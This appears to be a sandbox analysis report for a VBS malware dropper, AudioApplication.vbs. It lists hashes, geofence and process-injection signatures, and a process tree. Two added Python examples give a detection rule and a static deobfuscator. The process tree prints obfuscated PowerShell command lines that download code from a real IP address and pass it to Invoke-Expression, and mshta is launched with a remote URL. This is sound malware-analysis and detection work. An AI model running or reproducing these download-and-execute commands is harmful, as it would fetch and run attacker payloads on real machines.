AudioApplication.vbs

General

Target: AudioApplication.vbs
Filesize: 3KB
Completed: 19-01-2022 07:09
Score: 10/10
MD5: 257cb7d47ef7b5221bd8d95cbdd7f47e
SHA1: 0f4cb975fbaf27684908503de9476a2d02646734
SHA256: b425d52cfdada3b73bdc0cb7bbcb57b72f2b2b95182dbc2d61fafecdcc6aa5f9

Malware Config

Extracted
Language: hta
URLs
  hta.dropper  http://185.7.214.7/BITRA/oo.html

Extracted
Language: ps1 (deobfuscated)
URLs
  ps1.dropper  http://185.7.214.7/BITRA/AU.PNG

Extracted
Language: ps1 (deobfuscated)
URLs
  ps1.dropper  http://185.7.214.7/BITRA/YES.PNG

Signatures 4


Discovery
  • Blocklisted process makes network request
    mshta.exe

    Reported IOCs

    flow  pid   process
    1     2464  mshta.exe
  • Checks computer location settings
    WScript.exe, mshta.exe

    Description

    Looks up the country code configured in the registry, likely a geofence.

    TTPs

    Query Registry; System Information Discovery

    Reported IOCs

    description        ioc                                                                                                  process
    Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  WScript.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  mshta.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Suspicious use of WriteProcessMemory
    WScript.exe, mshta.exe

    Reported IOCs

    description                       pid   process      target process
    PID 2068 wrote to memory of 2464  2068  WScript.exe  mshta.exe
    PID 2068 wrote to memory of 2464  2068  WScript.exe  mshta.exe
    PID 2464 wrote to memory of 1416  2464  mshta.exe    powershell.exe
    PID 2464 wrote to memory of 1416  2464  mshta.exe    powershell.exe
    PID 2464 wrote to memory of 1868  2464  mshta.exe    powershell.exe
    PID 2464 wrote to memory of 1868  2464  mshta.exe    powershell.exe
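The four signatures above describe one chain: a script host starts mshta.exe with a remote URL, mshta.exe queries the Geo\Nation key and then starts powershell.exe running an obfuscated Invoke-Expression. The rule set below turns that chain into detection logic over process-creation and registry-query events. It is an added example, not part of the sandbox report or its signature set; the event records are constructed Sysmon-style dicts modelled on the process tree in this report (the explorer.exe PID, the benign mshta.exe run and the field and rule names are this example's own assumptions).

```python
import re

# Processes that should not normally be reading the user's country code.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
GEO_NATION_RE = re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.IGNORECASE)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)

# Constructed events modelled on this report's process tree (Sysmon-like fields;
# explorer.exe PID 1200 and the benign mshta.exe PID 3100 are invented controls).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 1200, "ppid": 800, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"type": "process", "pid": 2068, "ppid": 1200, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AudioApplication.vbs"'},
    {"type": "process", "pid": 2464, "ppid": 2068, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://185.7.214.7/BITRA/oo.html'},
    # Abbreviated form of the obfuscated command line the report shows for PID 1416.
    {"type": "process", "pid": 1416, "ppid": 2464,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe $c1='(Ne{end}w-Obj{end}ect'.replace('{end}', '');I`E`X $c1|I`E`X"},
    # Benign control: an interactive user opening a local .hta from Explorer.
    {"type": "process", "pid": 3100, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Tools\inventory.hta'},
    {"type": "registry", "pid": 2068,
     "key": r"\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation"},
    {"type": "registry", "pid": 2464,
     "key": r"\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation"},
    # Benign control: the shell itself reading the same value.
    {"type": "registry", "pid": 1200,
     "key": r"\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def strip_backticks(cmd: str) -> str:
    """In a bare PowerShell token a backtick before a letter is a no-op escape, so I`E`X == IEX."""
    return re.sub(r"`([A-Za-z])", r"\1", cmd)


def evaluate(events):
    """Return (pid, rule_name) hits for the mshta/PowerShell chain seen in this report."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    hits = []
    for e in events:
        if e["type"] == "process":
            img = basename(e["image"])
            parent = by_pid.get(e["ppid"])
            pimg = basename(parent["image"]) if parent else ""
            # Signature 1: mshta.exe handed a remote document instead of a local .hta.
            if img == "mshta.exe" and URL_RE.search(e["cmdline"]):
                hits.append((e["pid"], "mshta_remote_url"))
            # WScript.exe -> mshta.exe parentage (the WriteProcessMemory rows above).
            if img == "mshta.exe" and pimg in {"wscript.exe", "cscript.exe"}:
                hits.append((e["pid"], "script_host_spawns_mshta"))
            # mshta.exe -> powershell.exe with Invoke-Expression, backtick-split or not.
            if img == "powershell.exe" and pimg == "mshta.exe" and IEX_RE.search(strip_backticks(e["cmdline"])):
                hits.append((e["pid"], "mshta_spawns_iex_powershell"))
        elif e["type"] == "registry":
            # Signature 2: a script host reading the Geo\Nation country code (geofence check).
            proc = by_pid.get(e["pid"])
            if proc and basename(proc["image"]) in SCRIPT_HOSTS and GEO_NATION_RE.search(e["key"]):
                hits.append((e["pid"], "script_host_geo_nation_lookup"))
    return hits


if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(f"{pid}\t{rule}")
```

The parent lookup is by PID within the same event batch, so on a real telemetry stream the process events must be loaded before the registry events they are joined against; the two benign controls (local .hta from Explorer, explorer.exe reading Geo\Nation) produce no hits.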
Processes 5
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AudioApplication.vbs"
    Checks computer location settings
    Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://185.7.214.7/BITRA/oo.html
      Blocklisted process makes network request
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/AU.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        PID:1416
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/YES.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        PID:1868
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 408 -p 2464 -ip 2464
    PID:2900
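Static deobfuscation of the two PowerShell command lines above, as an added example that is not part of the sandbox report or the malware itself: it evaluates the `'...'.replace('{end}', '')` literals (honouring PowerShell's `''` quote escape), applies the `-Join ''` in the order the expression names the variables, strips the backtick-split `I`E`X`, and recovers the download cradle handed to Invoke-Expression without executing anything. The two command lines are copied from the report; the regular expressions and function names are this example's own, and they cover only the string-fragment obfuscation seen here.

```python
import re

# Command line recorded for PID 1416, copied from the report (constructed as a Python literal).
SAMPLE_CMDLINE_1416 = (
    "$c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'"
    ".replace('{end}', ''); "
    "$c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'"
    ".replace('{end}', ''); "
    "$c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/AU.PNG'')'"
    ".replace('{end}', '');"
    "$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)
# Command line recorded for PID 1868: same cradle, -noexit, second-stage URL YES.PNG.
SAMPLE_CMDLINE_1868 = "-noexit " + SAMPLE_CMDLINE_1416.replace("AU.PNG", "YES.PNG")

# $var='<single-quoted literal>'.replace('<junk>', '')
ASSIGN_RE = re.compile(
    r"\$(?P<var>\w+)\s*=\s*'(?P<body>(?:[^']|'')*)'\.replace\('(?P<junk>[^']*)',\s*''\)",
    re.IGNORECASE,
)
# $dst=($a,$b,$c -Join '')
JOIN_RE = re.compile(r"\$(?P<dst>\w+)\s*=\s*\((?P<parts>[^)]*?)\s+-join\s+''\)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def ps_single_quoted(body: str) -> str:
    """Unescape a PowerShell single-quoted literal: a doubled '' is one quote."""
    return body.replace("''", "'")


def strip_backticks(cmd: str) -> str:
    """Backtick before a letter in a bare token is a no-op escape (I`E`X == IEX).
    Only safe outside double-quoted strings, where `n and `t would mean something."""
    return re.sub(r"`([A-Za-z])", r"\1", cmd)


def collect_fragments(cmdline: str) -> dict:
    """Statically evaluate every $var='...'.replace('junk', '') assignment."""
    frags = {}
    for m in ASSIGN_RE.finditer(cmdline):
        frags[m.group("var")] = ps_single_quoted(m.group("body")).replace(m.group("junk"), "")
    return frags


def resolve_joins(cmdline: str, frags: dict) -> dict:
    """Evaluate $dst=($a,$b,... -Join '') in the order the -Join lists its operands,
    which need not be the order the fragments were assigned."""
    values = dict(frags)
    for m in JOIN_RE.finditer(cmdline):
        names = [p.strip().lstrip("$") for p in m.group("parts").split(",")]
        values[m.group("dst")] = "".join(values[n] for n in names)
    return values


def deobfuscate(cmdline: str) -> str:
    """Return the string that the first IEX / Invoke-Expression evaluates."""
    values = resolve_joins(cmdline, collect_fragments(cmdline))
    m = re.search(r"\b(?:iex|invoke-expression)\s+\$(\w+)", strip_backticks(cmdline), re.IGNORECASE)
    if not m:
        raise ValueError("no Invoke-Expression of a variable found")
    return values[m.group(1)]


def analyze(cmdline: str) -> dict:
    """Recovered stage, the URLs it contacts, and whether its output is piped into IEX again."""
    stage = deobfuscate(cmdline)
    piped = re.search(r"\|\s*(?:iex|invoke-expression)\b", strip_backticks(cmdline), re.IGNORECASE)
    return {"stage": stage, "urls": URL_RE.findall(stage), "pipes_to_iex": bool(piped)}


if __name__ == "__main__":
    for name, cmd in (("PID 1416", SAMPLE_CMDLINE_1416), ("PID 1868", SAMPLE_CMDLINE_1868)):
        print(name, analyze(cmd))
```

The `pipes_to_iex` flag records the second `I`E`X`: the first Invoke-Expression runs the `DownloadString` cradle, and its result (the body of AU.PNG or YES.PNG, which the report does not contain) is piped into a second Invoke-Expression, so the files named .PNG are PowerShell, not images.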
Network
MITRE ATT&CK Matrix

Collection | Command and Control | Credential Access | Defense Evasion | Execution | Exfiltration | Impact | Initial Access | Lateral Movement | Persistence | Privilege Escalation